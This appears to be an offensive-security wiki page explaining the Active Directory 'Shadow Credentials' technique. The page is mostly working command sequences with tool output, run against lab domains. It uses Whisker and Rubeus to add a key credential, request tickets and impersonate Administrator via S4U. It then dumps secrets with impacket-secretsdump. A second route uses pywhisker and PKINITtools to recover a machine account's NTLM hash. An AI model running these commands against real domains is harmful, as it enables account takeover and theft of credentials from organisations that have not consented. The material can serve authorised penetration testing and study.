Shadow Credentials

This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates.

Pre-requisites

Domain must have Active Directory Certificate Services and Certificate Authority configured.
Domain must have at least one DC running with Windows Server 2016 that supports PKINIT.

Attack example

In this example we notice the following:

MARCUS has the AddKeyCredentialLink privilege over ZPH-SVRMGMT1$

Whisker.exe / Rubeus.exe

Whisker.exe

Whisker.exe add /target:ZPH-SVRMGMT1$

[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password Koy2qZYtg2UAChxZ
[*] Searching for the target account
[*] Target user found: CN=ZPH-SVRMGMT1,OU=Exchange,OU=Servers,OU=Company,DC=FAKE,DC=internal
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 97f66e08-28f3-433b-ab4d-b056e8cb0cb6
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:DRSMS015$ /certificate:MIIJyAI...CAgfQ /password:"Koy2qZYtg2UAChxZ" /domain:FAKE.internal /dc:DC01.FAKE.internal /getcredentials /show /ptt /nowrap

Can now perform S4U attack with previously obtained ticket:

Rubeus.exe s4u /dc:DC01.FAKE.internal /ticket:doIGcjCCBm...pbnRyYQ== /impersonateuser:Administrator /ptt /self /service:host/ZPH-SVRMGMT1.FAKE.internal /altservice:cifs/ZPH-SVRMGMT1.FAKE.internal

Test if it worked:

dir \\ZPH-SVRMGMT1.FAKE.internal\c$

Now you can either PsExec, or we can continue from Kali Linux to remotely dump secrets:

python3 rubeustoccache.py doIGZDCC...uaW50cmE= kirbi_out2 ccache6

export KRB5CCNAME=kirbi_out2

See following for more info for Kerberos for linux:

Kerberos on Linux

Can now remotely dump secrets:

impacket-secretsdump -k ZPH-SVRMGMT1.FAKE.internal

Pywhisker / PKINIT

Pywhisker

We will use pywhisker to add a new credential pair to the AD object:

python pywhisker.py -d "ZSM.LOCAL" -u "MARCUS" -p "Pass123" --target "ZPH-SVRMGMT1$" --dc-ip 192.168.210.10 --action "add"

(pay attention to the outputted files/password, we will use this for the next step)

Dirkjan -> PKINITtools

Now we use gettgtpkinit.py to request a TGT using a PFX file. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which we will need for getnthash.py tool:

python gettgtpkinit.py ZSM.LOCAL/ZPH-SVRMGMT1\$ -cert-pfx ../pywhisker/JSP8q582.pfx -pfx-pass ynACzUgAF01HAJuxyu7Z SVRMGMT1.ccache -dc-ip 192.168.210.10

Now we use getnthash.py to submit a TGS request for the account. This will include with the PAC which in turn contains the NT hash that we can decrypt with the AS-REP key that was used for the specific TGT. This tool requires a TGT resulting from PKINIT to be in ourKRB5CCNAME env variable:

export KRB5CCNAME=SVRMGMT1.ccache

python getnthash.py ZSM.LOCAL/ZPH-SVRMGMT1\$ -key d902f45bf4b9727cf5b2a7ca3fa3a1283ca60f4720b964159ecb41ae758275f4 -dc-ip 192.168.210.10

We got a valid NTLM hash for the account!

[+] zsm.local\ZPH-SVRMGMT1$:89d0b5687....ad336a77b8ef2f

Machines dont have remote admin access to themselves -> S4U2Self Abuse

Tooling

Last updated 1 year ago